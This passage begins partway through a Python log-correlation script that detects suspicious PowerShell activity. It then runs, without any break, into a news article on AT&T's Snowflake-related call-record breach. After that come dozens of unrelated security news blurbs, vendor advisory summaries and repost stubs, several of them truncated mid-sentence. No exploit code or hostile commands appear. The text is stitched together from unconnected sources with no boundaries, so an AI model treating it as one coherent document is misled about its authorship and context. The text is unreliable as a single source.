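    (ts, host, kind, user, detail) so later stages never see raw formats."""
    events = []
    for line in edr.splitlines():
        r = json.loads(line)
        events.append({"ts": datetime.fromisoformat(r["ts"]), "host": r["host"],
                       "kind": r["type"], "user": r.get("user"),
                       "detail": r.get("cmd") or r.get("path")})
    for line in fw.splitlines():
        m = FW_RE.match(line)
        events.append({"ts": datetime.fromisoformat(m["ts"]), "host": m["host"],
                       "kind": "network", "user": None, "detail": m["dst"]})
    for line in dc.splitlines():
        m = DC_RE.match(line)
        events.append({"ts": datetime.fromisoformat(m["ts"]), "host": m["host"],
                       "kind": "logon", "user": m["user"], "detail": m["result"]})
    return sorted(events, key=lambda e: e["ts"])  # centralized, time-ordered store


def is_suspicious_powershell(cmd):
    """Detection rule: a PowerShell run is an anchor only if it carries
    one of the flagged options; an ordinary script run stays silent."""
    c = cmd.lower()
    return "powershell" in c and any(f in c for f in SUSPICIOUS_PS_FLAGS)


def correlate(events, window=timedelta(minutes=5)):
    """Correlation: for each suspicious PowerShell anchor, merge the other
    events from the same host inside the window into one incident and
    score it higher the more kinds of activity are linked to it."""
    by_host = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)
    incidents = []
    for host, evs in by_host.items():
        anchors = [e for e in evs if e["kind"] == "process" and is_suspicious_powershell(e["detail"])]
        for anchor in anchors:
            related = [e for e in evs if abs(e["ts"] - anchor["ts"]) <= window]
            kinds = {e["kind"] for e in related}
            score = 50 + 15 * len(kinds - {"process"})  # file + network + logon -> 95
            incidents.append({"host": host, "user": anchor["user"],
                              "kinds": sorted(kinds), "score": score})
    return sorted(incidents, key=lambda i: -i["score"])  # prioritized for the console


if __name__ == "__main__":
    for inc in correlate(normalize()):
        print(inc)
```

Running it yields a single incident for ws-23 that ties together the logon, the PowerShell run, the file write and the outbound connection; ws-17's routine backup script produces nothing, which is exactly the "don't page on every PowerShell run" behaviour the text describes. In a real deployment the window, the scoring and the flag list would come from the vendor's rule set and your own threat intelligence rather than from constants in a script.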
AT&T Corp. disclosed today that a new data breach has exposed phone call and text message records for roughly 110 million people — nearly all of its customers. AT&T said it delayed disclosing the incident in response to “national security and public safety concerns,” noting that some of the records included data that could be used to determine where a call was made or text message sent. AT&T also acknowledged the customer records were exposed in a cloud database that was protected only by a username and password (no multi-factor authentication needed). In a regulatory filing with the U.S. Securities and Exchange Commission today, AT&T said cyber intruders accessed an AT&T workspace on a third-party cloud platform in April, downloading files containing customer call and text interactions between May 1 and October 31, 2022, as well as on January 2, 2023. The company said the stolen data includes records of calls and texts for mobile providers that resell AT&T’s service, but that it does not include the content of calls or texts, Social Security numbers, dates of birth, or any other personally identifiable information. However, the company said a subset of stolen records included information about the location of cellular communications towers closest to the subscriber, data that could be used to determine the approximate location of the customer device initiating or receiving those text messages or phone calls. “While the data does not include customer names, there are often ways, using publicly available online tools, to find the name associated with a specific telephone number,” AT&T allowed. AT&T said it learned of the breach on April 19, but delayed disclosing it at the request of federal investigators. The company’s SEC disclosure says at least one individual has been detained by the authorities in connection with the breach. In a written statement shared with KrebsOnSecurity, the FBI confirmed that it asked AT&T to delay notifying affected customers. “Shortly after identifying a potential breach to customer data and before making its materiality decision, AT&T contacted the FBI to report the incident,” the FBI statement reads.
“In assessing the nature of the breach, all parties discussed a potential delay to public reporting under Item 1.05(c) of the SEC Rule, due to potential risks to national security and/or public safety. AT&T, FBI, and DOJ worked collaboratively through the first and second delay process, all while sharing key threat intelligence to bolster FBI investigative equities and to assist AT&T’s incident response work.” Techcrunch quoted an AT&T spokesperson saying the customer data was stolen as a result of a still-unfolding data breach involving more than 160 customers of the cloud data provider Snowflake. Earlier this year, malicious hackers figured out that many major companies have uploaded massive amounts of valuable and sensitive customer data to Snowflake servers, all the while protecting those Snowflake accounts with little more than a username and password. Wired reported last month how the hackers behind the Snowflake data thefts purchased stolen Snowflake credentials from dark web services that sell access to usernames, passwords and authentication tokens that are siphoned by information-stealing malware. For its part, Snowflake says it now requires all new customers to use multi-factor authentication. Other companies with millions of customer records stolen from Snowflake servers include Advance Auto Parts, Allstate, Anheuser-Busch, Los Angeles Unified, Mitsubishi, Neiman Marcus, Progressive, Pure Storage, Santander Bank, State Farm, and Ticketmaster. Earlier this year, AT&T reset passwords for millions of customers after the company finally acknowledged a data breach from 2018 involving approximately 7.6 million current AT&T account holders and roughly 65.4 million former account holders. Mark Burnett is an application security architect, consultant and author. Burnett said the only real use for the data stolen in the most recent AT&T breach is to know who is contacting whom and how many times. 
“The most concerning thing to me about this AT&T breach of ALL customer call and text records is that this isn’t one of their main databases; it is metadata on who is contacting who,” Burnett wrote on Mastodon. “Which makes me wonder what would call logs without timestamps or names have been used for.” It remains unclear why so many major corporations persist in the belief that it is somehow acceptable to store so much sensitive customer data with so few security protections. For example, Advance Auto Parts said the data exposed included full names, Social Security numbers, driver’s licenses and government-issued ID numbers on 2.3 million people who were former employees or job applicants. That may be because, apart from the class-action lawsuits that invariably ensue after these breaches, there is little holding companies accountable for sloppy security practices. AT&T told the SEC it does not believe this incident is likely to materially impact AT&T’s financial condition or results of operations. AT&T reported revenues of more than $30 billion in its most recent quarter.
The Cloud Safe Task Force aims to unite the US government and cloud service providers, like Amazon, Google, IBM, Microsoft, and Oracle, to provide a "National Cyber Feed": a continuous threat-monitoring tool for federal agencies.
In the scrum, countless call and text records leaked, other cell companies caught strays, the DoJ became involved, and someone has already been arrested.
Ransomware gangs are now creating custom data-stealing malware instead of just encrypting files. Mature crime organizations are investing in bespoke data theft tools, according to a Cisco Talos report on the top 14 ransomware groups.
A new ransomware gang known as EstateRansomware is exploiting a Veeam vulnerability that was patched over a year ago to spread file-encrypting malware and demand ransom payments.
Cytactic, an Israel-based provider of a platform pioneering cyber crisis readiness and management, raised $16M in a seed funding round led by Evolution Equity Partners. It intends to use the funds to expand operations and development efforts.
Google's V8 engine compiles JavaScript into low-level bytecode, which makes analysis and detection of that compiled code difficult. Attacks that ship this bytecode instead of source rely on compatibility with the V8 engine for successful execution.
The attack, identified as a distributed denial-of-service attack (DDoS), affected websites of security services, police, fire and rescue services, and the academy for public security forces.
The attacks were detected earlier this year, with indicators of compromise shared by AhnLab Security Intelligence Center. The attackers initiate their attacks with phishing emails containing malicious attachments disguised as documents.
FIN7, a cybercrime group responsible for billions in losses, was dismantled by U.S. authorities in 2023. However, they resurfaced in 2024 with Stark Industries Solutions, hosting thousands of fake websites mimicking renowned companies.
The PHP vulnerability, tracked as CVE-2024-4577, with a CVSS score of 9.8, allows attackers to execute commands on Windows systems using Chinese and Japanese language settings.
JAXA was targeted with zero-day exploits during its investigation with Microsoft into a 2023 cyberattack. The attack mainly affected its Active Directory system, prompting JAXA to shut down networks to prevent data compromise.
Ubuntu Security Notice 6896-1 - It was discovered that the ATA over Ethernet driver in the Linux kernel contained a race condition, leading to a use-after-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the Atheros 802.11ac wireless driver did not properly validate certain data structures, leading to a NULL pointer dereference. An attacker could possibly use this to cause a denial of service.
Debian Linux Security Advisory 5729-1 - Multiple vulnerabilities have been discovered in the Apache HTTP server, which may result in authentication bypass, execution of scripts in directories not directly reachable by any URL, server-side request forgery or denial of service.
Ubuntu Security Notice 6895-1 - It was discovered that the ATA over Ethernet driver in the Linux kernel contained a race condition, leading to a use-after-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the HugeTLB file system component of the Linux kernel contained a NULL pointer dereference vulnerability. A privileged attacker could possibly use this to cause a denial of service.
Ubuntu Security Notice 6864-3 - It was discovered that the Intel Data Streaming and Intel Analytics Accelerator drivers in the Linux kernel allowed direct access to the devices for unprivileged users and virtual machines. A local attacker could use this to cause a denial of service. A security issue was discovered in the Linux kernel. An attacker could possibly use it to compromise the system.
Ubuntu Security Notice 6885-2 - USN-6885-1 fixed vulnerabilities in Apache HTTP Server. One of the security fixes introduced a regression when proxying requests to an HTTP/2 server. This update fixes the problem. Marc Stern discovered that the Apache HTTP Server incorrectly handled serving WebSocket protocol upgrades over HTTP/2 connections. A remote attacker could possibly use this issue to cause the server to crash, resulting in a denial of service. Orange Tsai discovered that the Apache HTTP Server mod_proxy module incorrectly sent certain request URLs with incorrect encodings to backends. A remote attacker could possibly use this issue to bypass authentication. Orange Tsai discovered that the Apache HTTP Server mod_rewrite module incorrectly handled certain substitutions. A remote attacker could possibly use this issue to execute scripts in directories not directly reachable by any URL, or cause a denial of service. Some environments may require using the new UnsafeAllow3F flag to handle unsafe substitutions. Orange Tsai discovered that the Apache HTTP Server incorrectly handled certain response headers. A remote attacker could possibly use this issue to obtain sensitive information, execute local scripts, or perform SSRF attacks. Orange Tsai discovered that the Apache HTTP Server mod_proxy module incorrectly handled certain requests. A remote attacker could possibly use this issue to cause the server to crash, resulting in a denial of service. It was discovered that the Apache HTTP Server incorrectly handled certain handlers configured via AddType. A remote attacker could possibly use this issue to obtain source code.
Ubuntu Security Notice 6893-1 - It was discovered that a race condition existed in the Bluetooth subsystem in the Linux kernel when modifying certain settings values through debugfs. A privileged local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.
Ubuntu Security Notice 6894-1 - Muqing Liu and neoni discovered that Apport incorrectly handled detecting if an executable was replaced after a crash. A local attacker could possibly use this issue to execute arbitrary code as the root user. Gerrit Venema discovered that Apport incorrectly handled connections to Apport sockets inside containers. A local attacker could possibly use this issue to connect to arbitrary sockets as the root user.
Ubuntu Security Notice 6888-2 - USN-6888-1 fixed several vulnerabilities in Django. This update provides the corresponding update for Ubuntu 18.04 LTS. Elias Myllymäki discovered that Django incorrectly handled certain inputs with a large number of brackets. A remote attacker could possibly use this issue to cause Django to consume resources or stop responding, resulting in a denial of service.
Red Hat Security Advisory 2024-4522-03 - An update is now available for Red Hat Ansible Automation Platform 2.4. Issues addressed include a denial of service vulnerability.
Red Hat Security Advisory 2024-4520-03 - The Migration Toolkit for Containers 1.7.16 is now available. Issues addressed include a memory exhaustion vulnerability.
Red Hat Security Advisory 2024-4329-03 - Red Hat OpenShift Container Platform release 4.14.32 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a bypass vulnerability.
The U.S. Department of Justice (DoJ) said it seized two internet domains and searched nearly 1,000 social media accounts that Russian threat actors allegedly used to covertly spread pro-Kremlin disinformation in the country and abroad on a large scale. "The social media bot farm used elements of AI to create fictitious social media profiles — often purporting to belong to individuals in the
Two Russian-born Australian citizens have been arrested and charged in the country for spying on behalf of Russia as part of a "complex" law enforcement operation codenamed BURGAZADA. This includes a 40-year-old woman, an Australian Defence Force (ADF) Army Private, and her husband, a 62-year-old self-employed laborer. Media reports have identified them as Kira Korolev and Igor Korolev,
In today's digital age, passwords serve as the keys to our most sensitive information, from social media accounts to banking and business systems. This immense power brings with it significant responsibility—and vulnerability. Most people don't realize their credentials have been compromised until the damage is done. Imagine waking up to drained bank accounts, stolen identities, or a company's
A critical security issue has been disclosed in the Exim mail transfer agent that could enable threat actors to deliver malicious attachments to target users' inboxes. The vulnerability, tracked as CVE-2024-39929, has a CVSS score of 9.1 out of 10.0. It has been addressed in version 4.98. "Exim through 4.97.1 misparses a multiline RFC 2231 header filename, and thus remote attackers can bypass
Cybersecurity researchers have shed light on a short-lived DarkGate malware campaign that leveraged Samba file shares to initiate the infections. Palo Alto Networks Unit 42 said the activity spanned the months of March and April 2024, with the infection chains using servers running public-facing Samba file shares hosting Visual Basic Script (VBS) and JavaScript files. Targets included North
Despite first appearing earlier this year, RansomHub is already considered one of the most prolific ransomware groups in existence. Read more in my article on the Tripwire State of Security blog.
The issue of whether to ban ransomware payments is a hotly debated topic in cybersecurity and policy circles. What are the implications of outlawing these payments, and would the ban be effective?
Source: www.databreachtoday.com – Author: Mathew J. Schwartz (euroinfosec) • July 12, 2024 – Categories: Breach Notification, Cybercrime, Fraud Management & Cybercrime – Ongoing Law Enforcement Investigation Led to Delay in Public Breach Notification. Attackers have stolen logs of call and text interactions pertaining to nearly every one of AT&T’s millions of […] The post "AT&T Details Massive Breach of Subscribers’ Call Logs" (source: www.databreachtoday.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.databreachtoday.com – Author: Chris Riotta (@chrisriotta) • July 11, 2024 – Categories: Artificial Intelligence & Machine Learning, Governance & Risk Management, Legislation & Litigation – New Bill Would Create Data Minimization Measures, Express Permission Requirements. Panelists: Ryan Calo, professor and co-director, University of Washington Tech Policy Lab; Amba Kak, co-executive director, AI […] The post "Experts: Federal Privacy Law Needed to Curb AI Data Misuse" (source: www.databreachtoday.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.databreachtoday.com – Author: Anviksha More (AnvikshaMore) • July 11, 2024 – Categories: Cybercrime, Fraud Management & Cybercrime, Incident & Breach Response – Also: Europol Decries Mobile Encryption; FBCS Breach Victim Count Grows. Every week, Information Security Media Group rounds up cybersecurity incidents and breaches around the world. This week, Microsoft […] The post "Breach Roundup: Microsoft Patches Zero-Day Active Since 2023" (source: www.databreachtoday.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.databreachtoday.com – Author: Marianne Kolbasuk McGee (HealthInfoSec) • July 11, 2024 – Categories: Breach Notification, HIPAA/HITECH, Security Operations – Midyear Analysis of HHS OCR ‘Wall of Shame’ Shows Hacks, Vendor Breaches Top List. Hacks and vendor incidents continue to dominate major health data breach trends in 2024, but a […] The post "Major Health Data Breaches: How Are Trends Shifting in 2024?" (source: www.databreachtoday.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.databreachtoday.com – Author: David Holmes, Research Analyst for Zero Trust, Security, and Risk, Forrester. David Holmes is a principal analyst at Forrester, advising security and risk professionals about strategy, architecture, and Zero Trust. His coverage includes security architecture (Zero Trust edge, SASE, microsegmentation, Zero Trust network access), network security controls (firewalls, automated malware […] The post "Justifying Your Hybrid Cloud Network Security Investment" (source: www.databreachtoday.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.databreachtoday.com – Author: Stephanie Chan, Security Product Marketing Lead, Google Workspace. Stephanie Chan is a B2B enterprise SaaS professional with 15 years of experience driving growth across customer success, product management, and product marketing. She has a proven track record crafting compelling messaging and content, executing successful product launches, and elevating market awareness […] The post "Live Webinar | Navigating Cyber Threats in the GenAI Era: Proven Security Strategies" (source: www.databreachtoday.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.databreachtoday.com – Original post URL: https://www.databreachtoday.com/webinars/webinar-old-school-awareness-training-does-hack-anymore-w-5717 The post "Webinar | Old-School Awareness Training Does Not Hack It Anymore" (source: www.databreachtoday.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.databreachtoday.com – Author: Mathew J. Schwartz (euroinfosec) • July 11, 2024 – Categories: Cloud Security, Identity & Access Management, Security Operations – Cloud Customers Should Demand More Security From Providers. Snowflake is a case study in the perils of not requiring all accounts to be secured using multifactor authentication. The […] The post "Multifactor Authentication Shouldn’t Be Optional" (source: www.databreachtoday.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.databreachtoday.com – Author: Brandy Harris • July 11, 2024 – How to Make a Plan, Continue to Learn and Leverage Your Experience. As a midlevel professional in IT or cybersecurity, you’ve likely honed your skills, built a strong foundation and gained valuable experience. But the evolving landscape of cybersecurity […] The post "Getting From Midlevel to Specialty Niche in Cybersecurity" (source: www.databreachtoday.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.